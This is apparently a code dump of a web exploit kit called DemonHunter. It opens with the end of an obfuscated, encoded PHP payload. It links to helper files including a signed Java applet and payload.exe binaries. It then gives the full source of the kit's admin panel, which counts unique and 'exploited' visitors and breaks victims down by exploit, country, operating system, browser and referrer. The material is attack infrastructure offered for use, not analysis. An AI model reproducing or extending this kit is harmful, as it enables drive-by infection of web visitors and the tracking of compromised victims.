lJHSTUFkwMxdG6b9p2t2ae6J80XSLCoRevXu28l605jRLUoa0JW3YQY3Nq2dzLsbKFz+gaYspJFBbpfP3Kp5hJhHTwI2AaTavtTUdRNK928Vuh3pTvEAsW5ymPlfY03McYHonJIrZVlvO6Sbi8ImExrqpDT/Q3wOJLco0uB3PmtebSuqSbAD7QEcTb5ReNFBd89QoqvFDrXZj3k0EEP3XgXGrdsXoi27iMpd1RFcqPcpYxhj3FbHQFIo81q+mg65yMd+dpqOouY2NosIO+4moAOJxCdYGqxDvXPio+rRHY8c+NY7WA6few9SHnuW3uRo8tLtmULDs73EQt2pQPB5/ToPCOitS69/38FO3bMgmxoHpFktl6Mu/jG3qlmxZzgn5GFKOOwvVoKqeR5lQaiNbfmpBeJvJt3EpbUStq5upz4YkQMq95EBLGc2pr96qgNALLEwcIwW1UuqvNcZCajD5k8L6796Su+xNwAxLoD/x4DHxAsLZY8QdJJFNpdt7BbCNpDWL4UE1NgrqxSKtWK0LmOZljSb4m6+HdTQjERr1cnruQw73i0vO1qJt3jE/L7QR/O6tEBlICPC9aRt4qbqMxb+D2yJiG8c2UIjttXRax3bogpB9ktsUHpZOBuo4yBy3B5ZyQbsgj6qn1cIn6ZUmQGji9uVEP3UsrpsXBHIlDPHUp6pJsHgVJ30X2RvrmFd27KEtUSLJuA5q7GrFSHulWIQwfQ3GIf339rCPzH3DuM9Bffv3zHw=='\x29\x29\x29\x3B","");
3 | ?>


--------------------------------------------------------------------------------
/modules/helpers/JavaSignedApplet.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/modules/helpers/JavaSignedApplet.jar


--------------------------------------------------------------------------------
/modules/helpers/index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/modules/helpers/index.php


--------------------------------------------------------------------------------
/modules/index.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/modules/index.php


--------------------------------------------------------------------------------
/payload.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/payload.exe


--------------------------------------------------------------------------------
/statistics/clear.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 
 4 | include('../config.php');
 5 | include('../include/sql.php');
 6 | include('../include/visitors.php');
 7 | 
 8 | session_start();
 9 | if(($_SESSION["login"] == false)){
10 | 	header("Location: login.php");
11 | 	exit();	
12 | }
13 | 
14 | $sql = new CSQL($sqlSettings);
15 | $sql->open();
16 | $cvisitors = new CVisitors($sql, $sqlSettings);
17 | $cvisitors->clearVisitors();
18 | header("Location: statistics.php");
19 | exit();
20 | 
21 | ?>
22 | 


--------------------------------------------------------------------------------
/statistics/css/styles.css:
--------------------------------------------------------------------------------
  1 | 
  2 | 
  3 | /* ----------LINK STYLES---------- */
  4 | a { cursor: pointer; outline: none; }
  5 | a:link { color: #ffffff; text-decoration: none; }
  6 | a:visited { color: #ffffff; text-decoration: none; }
  7 | a:hover { color: #00ccff; text-decoration: none; }
  8 | a img { border: none;}
  9 | 
 10 | body, html {
 11 | 	background-color: #000000;
 12 | 	text-align: center;
 13 | 	font: 12px "verdana";
 14 | 	margin: 0px 0px 0px 0px;
 15 | 	color: white;
 16 | }
 17 | 
 18 | #wrapper {
 19 | 	width: 1024px;
 20 | 	margin: 0 auto;
 21 | 	border: 1px solid #282828;
 22 | 	background-color: #000;
 23 | 	padding-bottom: 5px;
 24 | }
 25 | 
 26 | #main-header {
 27 | 	width: 100%;
 28 | }
 29 | 
 30 | #main-header-banner {
 31 | 	width: 100%;
 32 | 	float: left;
 33 | 	background-image: url(../images/logo.png);
 34 | 	background-repeat: no-repeat;
 35 | 	height: 152px;
 36 | 	margin-left: 25px;
 37 | }
 38 | 
 39 | #main-body {
 40 | 	width: 100%;
 41 | 	float: left;
 42 | 	margin-bottom: 40px;
 43 | }
 44 | 
 45 | #main-body-top {
 46 | 	width: 100%;
 47 | 	float: left;
 48 | 	border-left: 1px solid #101010;
 49 | 	margin-top: 40px;
 50 | }
 51 | 
 52 | #main-body-referrer {
 53 | 	width: 100%;
 54 | 	float: left;
 55 | 	border-left: 1px solid #101010;
 56 | 	margin-top: 10px;
 57 | }
 58 | 
 59 | .referrer-box {
 60 | 	font: 12px "verdana";
 61 | 	margin-left: 25px; 
 62 | 	float: left;
 63 | 	width: 94%;
 64 | 	border: 1px solid #3d0d0d;
 65 | 	background:#1F1F1F;
 66 | 	text-align: left;
 67 | 	padding: 2px 2px 2px 2px;
 68 | }
 69 | 
 70 | .referrer-box table {
 71 | 	font: 12px "verdana";
 72 | 	float: left;
 73 | 	width: 90%;
 74 | 	margin-left: 25px; 
 75 | }
 76 | 
 77 | .referrer-box td {
 78 | 	height: 30px;
 79 | }
 80 | 
 81 | .referrer-box-title {
 82 | 	font: 15px "verdana";
 83 | 	text-align: center;
 84 | 	border-bottom: 1px solid #282828;
 85 | }
 86 | 
 87 | #main-body-login {
 88 | 	width: 100%;
 89 | 	float: left;
 90 | 	border-left: 1px solid #101010;
 91 | 	margin-top: 40px;
 92 | }
 93 | 
 94 | .login-box {
 95 | 	font: 12px "verdana";
 96 | 	margin-left: 290px; 
 97 | 	float: left;
 98 | 	width: 40%;
 99 | 	border: 1px solid #3d0d0d;
100 | 	background:#1F1F1F;
101 | 	text-align: left;
102 | 	padding: 2px 2px 2px 2px;
103 | }
104 | 
105 | .login-box table {
106 | 	font: 12px "verdana";
107 | 	float: left;
108 | 	width: 90%;
109 | 	margin-left: 25px; 
110 | }
111 | 
112 | .login-box td {
113 | 	height: 30px;
114 | }
115 | 
116 | .login-box-title {
117 | 	font: 15px "verdana";
118 | 	text-align: center;
119 | 	border-bottom: 1px solid #282828;
120 | }
121 | 
122 | .top-box {
123 | 	font: 12px "verdana";
124 | 	margin-left: 25px; 
125 | 	float: left;
126 | 	width: 94%;
127 | 	border: 1px solid #3d0d0d;
128 | 	background:#1F1F1F;
129 | 	text-align: left;
130 | 	padding: 2px 2px 2px 2px;
131 | }
132 | 
133 | .top-box table {
134 | 	font: 12px "verdana";
135 | 	float: left;
136 | 	width: 90%;
137 | 	margin-left: 25px; 
138 | }
139 | 
140 | .top-box td {
141 | 	height: 30px;
142 | }
143 | 
144 | .top-box-title {
145 | 	font: 15px "verdana";
146 | 	text-align: center;
147 | 	border-bottom: 1px solid #282828;
148 | }
149 | 
150 | #main-body-left {
151 | 	background: #000000;
152 | 	width: 50%;
153 | 	float: left;
154 | 	margin-top: 10px;
155 | }
156 | 
157 | #main-body-left table {
158 | 	float: left;
159 | 	width: 90%;
160 | 	margin-left: 25px;
161 | }
162 | 
163 | #main-body-left td.header {
164 | 	border: 1px solid #1c4a14;
165 | }
166 | 
167 | #main-body-right {
168 | 	width: 49%;
169 | 	float: left;
170 | 	border-left: 1px solid #101010;
171 | 	margin-top: 10px;
172 | }
173 | 
174 | .content-box {
175 | 	font: 12px "verdana";
176 | 	margin-left: 25px; 
177 | 	float: left;
178 | 	width: 90%;
179 | 	border: 1px solid #3d0d0d;
180 | 	background:#1F1F1F;
181 | 	text-align: left;
182 | 	padding: 2px 2px 2px 2px;
183 | }
184 | 
185 | .content-box table {
186 | 	font: 12px "verdana";
187 | 	float: left;
188 | 	width: 90%;
189 | 	margin-left: 25px; 
190 | }
191 | 
192 | .content-box td {
193 | 	height: 30px;
194 | }
195 | 
196 | .content-box-title {
197 | 	font: 15px "verdana";
198 | 	text-align: center;
199 | 	border-bottom: 1px solid #282828;
200 | 	padding-top: 3px;
201 | 	padding-bottom: 3px;
202 | }
203 | 
204 | .clearfix:after {
205 | 	content: ".";
206 | 	display: block;
207 | 	clear: both;
208 | 	visibility: hidden;
209 | 	line-height: 0;
210 | 	height: 0;
211 | }
212 |  
213 | .clearfix {
214 | 	display: inline-block;
215 | }
216 |  
217 | html[xmlns] .clearfix {
218 | 	display: block;
219 | }
220 |  
221 | * html .clearfix {
222 | 	height: 1%;
223 | }
224 | 
225 | 
226 | /* ----------NAVIGATION STYLES---------- */
227 | .navigation { 
228 | 	float: left;
229 | 	width: 1300px;
230 | 	height: 50px;
231 | 	margin-top: -9px;
232 | 	margin-left: -40px;
233 | }
234 | .nav-links li { 
235 | 	list-style-type: none; 
236 | 	float: left;
237 | }
238 | .nav-links li a { 
239 | 	height: 47px;
240 | 	width: 160px;
241 | 	text-indent: -9999px;
242 | 	display: block;
243 | }
244 | li.spacer {
245 | 	background:url(../images/spacer.png) repeat-x;
246 | 	height: 51px;
247 | 	width: 115px;
248 | }
249 | li.spacer1 {
250 | 	background:url(../images/spacer.png) repeat-x;
251 | 	height: 51px;
252 | 	width: 95px;
253 | }
254 | li.spacer2 {
255 | 	background:url(../images/spacer2.png) repeat-x;
256 | 	height: 51px;
257 | 	width: 20px;
258 | }
259 | li.clear {
260 | 	background:url(../images/clear.png) no-repeat;
261 | 	height: 51px;
262 | 	width: 127px;
263 | }
264 | li.logout {
265 | 	background:url(../images/logout.png) no-repeat;
266 | 	height: 51px;
267 | 	width: 128px;
268 | }
269 | li.middlebar {
270 | 	background:url(../images/middlebar.png) no-repeat;
271 | 	height: 69px;
272 | 	width: 309px;
273 | }
274 | 
275 | 
276 | li.clear a:hover {
277 | 	background:url(../images/clear_hover.png) no-repeat;
278 | 	height: 51px;
279 | 	width: 127px;
280 | }
281 | li.logout a:hover {
282 | 	background:url(../images/logout_hover.png) no-repeat;
283 | 	height: 51px;
284 | 	width: 128px;
285 | }
286 | 


--------------------------------------------------------------------------------
/statistics/images/clear.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/clear.png


--------------------------------------------------------------------------------
/statistics/images/clear_hover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/clear_hover.png


--------------------------------------------------------------------------------
/statistics/images/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/logo.png


--------------------------------------------------------------------------------
/statistics/images/logout.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/logout.png


--------------------------------------------------------------------------------
/statistics/images/logout_hover.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/logout_hover.png


--------------------------------------------------------------------------------
/statistics/images/middlebar.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/middlebar.png


--------------------------------------------------------------------------------
/statistics/images/payload.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/payload.exe


--------------------------------------------------------------------------------
/statistics/images/spacer.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/spacer.png


--------------------------------------------------------------------------------
/statistics/images/spacer2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kurtcoke/DemonHunter_Exploitkit/28fab1fb7ca64eec1468755e4a4be4507bcd386c/statistics/images/spacer2.png


--------------------------------------------------------------------------------
/statistics/index.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 
 4 | session_start();
 5 | if(($_SESSION["login"] == true)){
 6 | 	header("Location: statistics.php");
 7 | 	exit();
 8 | }else{
 9 | 	header("Location: login.php");
10 | 	exit();	
11 | }
12 | ?>
13 | 


--------------------------------------------------------------------------------
/statistics/login.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 
 4 | include('../config.php');
 5 | 
 6 | 
 7 | session_start();
 8 | if(isset($_POST["user"]) && ($_POST["user"] == $panel_user) && isset($_POST["pass"]) && ($_POST["pass"] == $panel_pass) || ($_SESSION["login"] == true)){
 9 | 	$_SESSION["login"] = true;
10 | 	header("Location: statistics.php");
11 | 	exit();
12 | }
13 | 
14 | ?>
15 | 
16 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
17 | <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
18 | 	<head>
19 | 		<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
20 | 		<title>Log In</title>
21 | 		<link rel="stylesheet" type="text/css" href="css/styles.css" />	
22 | 	</head>
23 | 
24 | <body>
25 | 	<div id="wrapper" class="clearfix">
26 | 		<div id="main-header">
27 | 			<div id="main-header-banner"></div>
28 | 		</div>
29 | 						
30 | 		<!-- NAVIGATION STARTS -->
31 | 		<div class="navigation">		
32 | 			<ul class="nav-links">        
33 | 				
34 | 				<li class="spacer">
35 | 				</li>
36 | 				<li class="spacer">
37 | 				</li>
38 | 				<li class="spacer">
39 | 				</li>				
40 | 				<li class="middlebar">
41 | 				</li>				
42 | 				<li class="spacer2">
43 | 				</li>
44 | 				<li class="spacer">
45 | 				</li>
46 | 				<li class="spacer">
47 | 				</li>
48 | 				<li class="spacer">
49 | 				</li>
50 | 				
51 | 			</ul>
52 | 		</div>
53 | 		<!-- NAVIGATION ENDS -->
54 | 						
55 | 		<!-- CONTENT STARTS -->
56 | 		<div id="main-body">
57 | 			
58 | 			<div id="main-body-login">
59 | 				<div class="login-box">
60 | 					<div class="login-box-title"><h4><b>Login</b></h4></div>
61 | 					<form method="post" action="login.php">
62 | 						<table>
63 | 							<tr>
64 | 								<td><b>User</b></td>
65 | 								<td><input type="text" name="user"></td>
66 | 							</tr>
67 | 							<tr>
68 | 								<td><b>Password</b></td>
69 | 								<td><input type="password" name="pass"></td>							
70 | 							</tr>
71 | 							<tr>
72 | 								<td></td>
73 | 								<td align="right"><input type="submit" value="Login"></td>
74 | 							</tr>
75 | 						</table>
76 | 					</form>
77 | 				</div>
78 | 			</div>			
79 | 		</div>
80 | 	</div>
81 | </body>
82 | </html>
83 | 


--------------------------------------------------------------------------------
/statistics/logout.php:
--------------------------------------------------------------------------------
1 | <?
2 | 
3 | session_start();
4 | $_SESSION["login"] = false;
5 | header("Location: login.php");
6 | exit();
7 | ?>
8 | 


--------------------------------------------------------------------------------
/statistics/statistics.php:
--------------------------------------------------------------------------------
  1 | <?
  2 | 
  3 | 
  4 | include('../config.php');
  5 | include('../include/sql.php');
  6 | include('../include/visitors.php');
  7 | 
  8 | session_start();
  9 | if(($_SESSION["login"] == false)){
 10 | 	header("Location: login.php");
 11 | 	exit();	
 12 | }
 13 | 
 14 | $sql = new CSQL($sqlSettings);
 15 | $sql->open();
 16 | 	
 17 | $cvisitors = new CVisitors($sql, $sqlSettings);
 18 | 	
 19 | $countVisitors = $cvisitors->getUniqueVisitorsCount();
 20 | $countExploitedVisitors = $cvisitors->getVisitorsExploitedCount();
 21 | $countNotExploitedVisitors = $countVisitors - $countExploitedVisitors;
 22 | 	
 23 | 	
 24 | if($countVisitors == 0 || $countExploitedVisitors == 0){
 25 | 	$exploitedPercentage = 0;
 26 | }else{
 27 | 	$exploitedPercentage = round($countExploitedVisitors * 100 / $countVisitors, 2);
 28 | }
 29 | 
 30 | 
 31 | 
 32 | ?>
 33 | 
 34 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 35 | <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
 36 | 	<head>
 37 | 		<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
 38 | 		<title>Statistics</title>
 39 | 		<link rel="stylesheet" type="text/css" href="css/styles.css" />
 40 | 	<? 
 41 | 	if($ajax_stats) {
 42 | 	?>
 43 | 	<script>
 44 | 	function Update()
 45 | 	{
 46 | 		if (window.XMLHttpRequest)
 47 | 		{
 48 | 			xmlhttp=new XMLHttpRequest();
 49 | 		}else{
 50 | 			xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
 51 | 		}
 52 | 		xmlhttp.onreadystatechange=function()
 53 | 		{
 54 | 			if (xmlhttp.readyState==4 && xmlhttp.status==200)
 55 | 			{
 56 | 				eval(xmlhttp.responseText);
 57 | 				setTimeout("Update()", <? echo $ajax_delay; ?>);
 58 | 			}
 59 | 		}
 60 | 		xmlhttp.open("GET","update.php",true);
 61 | 		xmlhttp.send();
 62 | 	}
 63 | 	</script>
 64 | 	<?
 65 | 	}
 66 | 	?>
 67 | 	</head>
 68 | 
 69 | <?
 70 | if($ajax_stats) {
 71 | 	echo "<body onload='Update();'>";
 72 | }else{
 73 | 	echo "<body>";
 74 | }
 75 | ?>
 76 | 
 77 | 	<div id="wrapper" class="clearfix">
 78 | 		<div id="main-header">
 79 | 			<div id="main-header-banner"></div>
 80 | 		</div>
 81 | 						
 82 | 		<!-- NAVIGATION STARTS -->
 83 | 		<div class="navigation">		
 84 | 			<ul class="nav-links">        
 85 | 				
 86 | 				<li class="spacer">
 87 | 				</li>
 88 | 				<li class="spacer">
 89 | 				</li>
 90 | 				<li class="clear">
 91 | 					<a href="clear.php" title="Clear">Clear</a>
 92 | 				</li>
 93 | 				
 94 | 				<li class="middlebar">
 95 | 				</li>
 96 | 				
 97 | 				<li class="logout">
 98 | 					<a href="logout.php" title="Logout">Logout</a>
 99 | 				</li>
100 | 				<li class="spacer2">
101 | 				</li>
102 | 				<li class="spacer1">
103 | 				</li>
104 | 				<li class="spacer">
105 | 				</li>
106 | 				
107 | 			</ul>
108 | 		</div>
109 | 		<!-- NAVIGATION ENDS -->
110 | 						
111 | 		<!-- CONTENT STARTS -->
112 | 		<div id="main-body">
113 | 			
114 | 			<div id="main-body-top">
115 | 				<div class="top-box">
116 | 					<div class="top-box-title"><h4><b>Overall Statistics</b></h4></div>
117 | 					<table>
118 | 						<tr>
119 | 							<td><b>Unique</b></td>
120 | 							<td><b>Exploited</b></td>
121 | 							<td><b>%</b></td>
122 | 						</tr>
123 | 						<tr>
124 | 							<td><div id='visitors'><? echo $countVisitors; ?></div></td>
125 | 							<td><div id='exploited'><? echo $countExploitedVisitors; ?></div></td>
126 | 							<td><div id='percentage'><? echo $exploitedPercentage; ?></div></td>
127 | 						</tr>
128 | 					</table>
129 | 				</div>
130 | 			</div>
131 | 			<div id="main-body-referrer">
132 | 				<div class="referrer-box">
133 | 					<div class="referrer-box-title"><h4><b>Statistics: Referrers</b></h4></div>
134 | 					<?
135 | 						$cvisitors->showVisitorsReferrerTop();
136 | 					?>
137 | 				</div>
138 | 			</div>
139 | 			<div id="main-body-left">
140 | 				<div class="content-box" style="margin-top: 5px;">
141 | 					<div class="content-box-title"><h4><b>Statistics: Exploits</b></h4></div>
142 | 			
143 | 					<?
144 | 						$cvisitors->showExploitsTable();
145 | 					?>
146 | 
147 | 				</div>
148 | 				<div class="content-box" style="margin-top: 5px;">
149 | 					<div class="content-box-title"><h4><b>Statistics: Country</b></h4></div>
150 | 					<?
151 | 						$cvisitors->showVisitorsCountryTop();
152 | 					?>
153 | 				</div>
154 | 			</div>
155 | 			<div id="main-body-right">				
156 | 				<div class="content-box" style="margin-top: 5px;">
157 | 					<div class="content-box-title"><h4><b>Statistics: Operating System</b></h4></div>
158 | 					<?
159 | 						$cvisitors->showOSInformation();
160 | 					?>
161 | 				</div>
162 | 				<div class="content-box" style="margin-top: 5px;">
163 | 					<div class="content-box-title"><h4><b>Statistics: Browser</b></h4></div>
164 | 					<?
165 | 						$cvisitors->showBrowserInformation();
166 | 					?>
167 | 				</div>
168 | 			</div>
169 | 		</div>
170 | 	</div>
171 | </body>
172 | </html>
173 | 


--------------------------------------------------------------------------------
/statistics/update.php:
--------------------------------------------------------------------------------
 1 | <?
 2 | 
 3 | 
 4 | include('../config.php');
 5 | include('../include/sql.php');
 6 | include('../include/visitors.php');
 7 | 
 8 | session_start();
 9 | if(($_SESSION["login"] == false)){
10 | 	exit();	
11 | }
12 | 
13 | $sql = new CSQL($sqlSettings);
14 | $sql->open();
15 | 	
16 | $cvisitors = new CVisitors($sql, $sqlSettings);
17 | 	
18 | $countVisitors = $cvisitors->getUniqueVisitorsCount();
19 | $countExploitedVisitors = $cvisitors->getVisitorsExploitedCount();
20 | $countNotExploitedVisitors = $countVisitors - $countExploitedVisitors;
21 | 	
22 | 	
23 | if($countVisitors == 0 || $countExploitedVisitors == 0){
24 | 	$exploitedPercentage = 0;
25 | }else{
26 | 	$exploitedPercentage = round($countExploitedVisitors * 100 / $countVisitors, 2);
27 | }
28 | 
29 | ?>
30 | 
31 | document.getElementById("visitors").innerHTML = <? echo $countVisitors; ?>;
32 | document.getElementById("exploited").innerHTML = <? echo $countExploitedVisitors; ?>;
33 | document.getElementById("percentage").innerHTML = <? echo $exploitedPercentage; ?>;
34 | 


--------------------------------------------------------------------------------